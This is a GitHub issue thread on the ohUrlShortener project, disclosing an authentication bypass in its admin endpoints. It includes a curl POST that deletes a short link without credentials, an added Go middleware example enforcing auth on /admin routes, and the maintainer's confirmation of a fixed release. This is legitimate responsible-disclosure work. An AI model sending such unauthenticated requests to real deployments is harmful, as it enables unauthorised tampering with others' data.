barats / ohUrlShortener

An enterprise-grade short-link service suited to small and medium community websites. Supports short-link generation, lookup and 302 redirection, with built-in click counting, unique-IP counting and access logs.
https://www.ohurls.cn
366 stars, 58 forks

Unauthorized access found in admin endpoints. #11

Closed douglas-oliveira-tc closed 2 years ago

douglas-oliveira-tc commented 2 years ago

I was implementing your project for an internal experiment, and found a critical issue that allows unauthenticated users to bypass auth controls.

Steps to reproduce:

curl -i -s -k -X $'POST' -H $'Host: admin.ohUrlShortener.com' -H $'Referer: http://admin.ohUrlShortener.com/admin/urls' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Content-Length: 18' --data-binary $'short_url=Ak3vaj58' $'http://admin.ohUrlShortener.com/admin/urls/delete'


All examples were run in my environment, the address used is only for illustration purposes.
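A defensive pattern for the class of bug reported above, as an added example that is not the project's own code: it uses only Go's net/http rather than the project's framework, and the session cookie and token are constructed stand-ins. Authentication is enforced once on the whole /admin subtree, so no admin endpoint can be reachable without it, and the reported POST is replayed against it to confirm it is rejected.

```go
package main

import (
	"net/http"
	"net/http/httptest"
	"strings"
)

// Constructed stand-in for a real session check; production code would validate a signed cookie against its session store.
const validSessionToken = "constructed-session-token"

func isAuthenticated(r *http.Request) bool {
	c, err := r.Cookie("session")
	return err == nil && c.Value == validSessionToken
}

// requireAuth wraps the whole /admin subtree, so every admin endpoint (including ones added later) needs a valid session.
func requireAuth(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if !isAuthenticated(r) {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		next.ServeHTTP(w, r)
	})
}

func newAdminMux() http.Handler {
	admin := http.NewServeMux()
	admin.HandleFunc("/admin/urls/delete", func(w http.ResponseWriter, r *http.Request) {
		w.WriteHeader(http.StatusOK) // deletion logic would go here
	})
	root := http.NewServeMux()
	root.Handle("/admin/", requireAuth(admin)) // middleware applied to the subtree, not per route
	return root
}

// deleteStatus replays the reported POST (with an optional session cookie) and returns the status code.
func deleteStatus(h http.Handler, session string) int {
	req := httptest.NewRequest(http.MethodPost, "/admin/urls/delete", strings.NewReader("short_url=Ak3vaj58"))
	if session != "" {
		req.AddCookie(&http.Cookie{Name: "session", Value: session})
	}
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code
}

func main() { println(deleteStatus(newAdminMux(), "")) } // prints 401
```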

barats commented 2 years ago

I'll check for this issue, TODAY.

barats commented 2 years ago

Turns out, it was my bad. Sorry about it.

Already fixed this issue and drafted a new release: https://github.com/barats/ohUrlShortener/releases/tag/v1.7


douglas-oliveira-tc commented 2 years ago

That's great, thanks a lot!

barats commented 2 years ago

That's great, thanks a lot!

I should thank you for reporting this issue.